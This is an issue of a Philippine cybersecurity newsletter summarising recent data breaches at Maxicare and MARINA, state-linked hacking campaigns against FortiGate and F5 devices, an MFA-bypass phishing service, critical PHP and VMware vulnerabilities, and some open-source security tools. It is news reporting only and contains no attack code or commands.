CyberSecurity.PH #024
Maxicare patient data breach; MARINA data breaches; Dutch intelligence on Chinese FortiGate hacks; Phishing-as-a-service delivering MFA bypass; Rapid weaponization of new PHP vulnerability; VMware RCE vulnerability; Cloudsploit a cloud configuration scanner
Hi, we have plenty of free online resources too! High quality cybersecurity learning materials, local education providers, loads of cybersecurity tools, plenty of policy templates to get you started, information on local conferences, relevant cybersecurity strategy papers and information on local cyber crime reporting.
CyberSecurity.PH is working hard to help improve cybersecurity outcomes in the Philippines by providing free cybersecurity reports that matter; up-to-date cyber threat landscape reports; and serious security-engineering highlights.
Tell your friends and subscribe to improve your cybersecurity capacity.
Philippines
Maxicare patient booking data breach via external provider Lab@Home
The Philippine National Privacy Commission (NPC) has stated it has received notification of a data breach event from Maxicare Healthcare Corporation over the weekend.
The patient booking data of approximately 13,000 members is understood to have leaked via third-party provider “Lab@Home” and includes; full name, employer identification data, Maxicare card number, date of birth, sex, contact phone numbers and email address.
A statement from Maxicare indicates the third-party “Lab@Home” systems do not integrate directly with Maxicare internal systems.
Further reading: Rappler, Inquirer, Manila Times, Kukublan Philippines
Philippine Maritime Industry Authority (MARINA) data breaches exposes maritime vessel information
The Philippine Maritime Industry Authority (MARINA) has confirmed a cyberattack has compromised at least 4 of its online processing systems.
According to information posted by Kukublan Philippines the data involved includes; Authority to Accept Payment (ATAP), Accomplishment Report Management System (ARMS), Integrated Domestic Shipping Information System (IDSIS), and SRB/SID Expedite Application System.
Reporting on this incident by the Philippine News Agency (PNA) indicates that MARINA does not believe seafarers’ data has been compromised, however the screenshots from the Kukublan post appear to show database-schemas that would indicate otherwise.
Further reading: PhilStar Global, ABS-CBN, Rappler
Cybersecurity Threat Landscape
Dutch intelligence: Chinese hacking campaign of FortiGate devices more extensive than previously known
The Dutch military intelligence and security service (MIVD) has issued an alert that describes a Chinese cyber-espionage campaign exploiting a vulnerability in FortiGate devices for at least two months before Fortinet announced or patched the vulnerability.
The vulnerability, tracked as CVE-2022- 42475 (CVSS 9.8) was exploited during this “zero day” period to infect 14,000 devices, with targets including dozens of Western governments, international organizations and a large number of companies within the defense industry.
The Dutch MIVD investigated the incident after discovering threat-actors had been able to deploy remote tools (named “COATHANGER”) that enabled the exfiltration of user account data from an Active Directory server operated by Dutch defence forces.
Further reading: Cyberscoop, Bleeping Computer, The Register, The Record
Indonesia and United States hold joint maritime port cybersecurity exercises
The United States and Indonesia have recently (June 10-13) completed maritime port cybersecurity simulation exercises to learn-from and prepare for attacks on critical Indonesian port infrastructure.
The exercise enabled cybersecurity officials to develop response capabilities through a series of simulations, including incidents with ship-to-shore cranes, ransomware attacks that disabled critical systems and exfiltrated proprietary and personal information.
Indonesian public and private sector participants were involved in the exercises.
Further reading: DHS.gov, The Record
ONNX phishing service delivers MFA bypass on Microsoft 365 accounts
Cybersecurity company “EclecticIQ” has posted an article detailing a phishing-as-a-service provider named “ONNX” that they believe is a re-branding of the “Caffeine” phishing kit that surfaced in 2022.
Of particular note are the techniques used to trick victims into a position where interception of MFA codes is possible - in short, threat actors send victims a PDF that includes a URL encoded in a QR code that in-turn takes users to look-a-like phishing sites - the narrative, delivery and content of the PDFs are convincing to many victim users.
This technique is effective and represents an evolution of learning by threat actors to discover what works - for example the use of QR codes is designed to prevent email-scanning systems observing the target URL because current email-scanning systems are not (yet) able to decode URLs encoded in QR codes.
Further reading: Dark Reading, Bleeping Computer
Chinese “Velvet Ant” threat actors targeting F5 devices in years-long campaign
Cybersecurity company Sygnia has posted a lengthy and in-depth analysis of observed activity from threat actors known as “Velvet Ant” with a state-sponsored China-nexus.
In particular the article describes a round of cat-and-mouse with the threat-actor to remove them from victim network(s) that ultimately led to discovery of their persistence using compromised F5 appliances with a reverse ssh-tunnel.
The post from Sygnia is an excellent read with up-to-date and real-world learnings for cyber threat responders.
Further reading: Hack Read, Cybersecurity News, Bleeping Computer
Tough week to be a user of Microsoft technologies
Users of Microsoft technologies and products are having a terrible time recently if they have an expectation of cybersecurity
- US Congress seeks answers from Microsoft boss after a “Cascade” of security errors putting governments at risk - Washington Post
- New MS Windows WiFi takeover attack - All windows users warned to update now - Forbes.com, The Register
- CISA warns of Windows bug (CVE-2024-26169) actively exploited in Black Basta ransomware attacks - Bleeping Computer
- Microsoft Postpones Windows Recall After Major Backlash - Windows Central / Microsoft has lost trust with its users - Windows Central
- ex Microsoft employee: Microsoft Chose Profit Over Security and Left U.S. Government Vulnerable to Russian Hack - Pro Publica
Certainly tough to manage the very large threat landscape that Microsoft ultimately manages.
Cybersecurity Tools and Engineering
A weekly highlight on tools and other resources (often open-source) that we use, find useful or is just plain interesting; check out our engineering-section online at CyberSecurity.PH too!
- aquasecurity/cloudsploit - CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts - github.com/aquasecurity/cloudsploit
- StamusNetworks/SELKS - a free and open source Debian-based IDS/IPS/Network Security Monitoring platform - github.com/StamusNetworks/SELKS
Cybersecurity Vulnerabilities
Threat actors rapidly weaponize recent PHP vulnerability for ransomware activity
Cybersecurity company Censys has posted details of ransomware activity by the TellYouThePass ransomware group that impacts websites using PHP.
The recent PHP vulnerability CVE-2024-4577 (CVSS 9.8) requires that the host be running PHP in “cgi mode” and be configured to use a Windows language locale of either Chinese or Japanese which explains why many Chinese language sites have been observed as impacted.
Further reading: Bleeping Computer, Ars Technica
VMware fixes critical vCenter remote-code-execution vulnerability, patch now
VMWare has patched another 3x new vulnerabilities impacting its VMware vCenter Server product.
- CVE-2024-37079 and CVE-2024-37080 - similar vulnerabilities in the vCenter Server DCERPC protocol that enable threat actors with network access to send specially crafted packets that lead to remote code execution - both with CVSS of 9.8
- CVE-2024-37081 - misconfiguration of sudo in vCenter Server that permits an authenticated local user to privilege escalate to root - CVSS of 7.8
Further Reading: The Register, Bleeping Computer, Dark Reading
Got news or something you’d like us to mention, feel free to get in contact - [email protected]